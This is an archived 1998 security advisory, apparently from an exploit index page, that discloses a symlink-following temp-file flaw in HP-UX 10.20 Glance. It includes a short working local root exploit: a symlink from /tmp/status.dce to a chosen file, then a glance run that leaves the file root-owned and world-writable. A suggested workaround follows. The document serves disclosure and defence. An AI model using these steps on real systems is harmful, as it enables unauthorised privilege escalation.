Yet ANOTHER hole in the HP/UX Glance program

Description:Standard symlink-following TMPFILE stupidity
Author:"J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: root (local)
Vulnerable Systems:HP/UX 10.20, perhaps other versions.
Date:27 April 1998

Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: HP-UX glance bug (#4?)

    * Software:

    HP-UX B.10.20 D
    Glance.Runtime.GLANCE                 B.10.20.95     HP GlancePlus files

    * Bug:

    glance creates a /tmp/status.dce file as root, and it follows
    symlinks, so you can append text like

Pid: 16208  File: ndi_sm.c         Line:   2609   Mon Apr 27 21:52:23 1998
Performance Management Application registered.

    to any system file.

    * Sample exploit:

    $ umask 000
        $ cd /tmp
    $ ln -s /.test status.dce
    $ glance -j 1 -iterations 1 -maxpages 1
    $ ls -l /.test
    -rw-rw-rw-   1 root       bar           1080 Apr 27 23:06 /.test

    # edit /.test to match your needs

        * Workaround:

        I guess creating a non writable /tmp/status.dce file
        and setting the t bit on /tmp (which it seems it has
        not in the default HPUX installation) would be enough

    * Note: I've been looking for HP-UX bugs, and I have found
    several reported holes in glance; but it seems this one
    is new...

    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: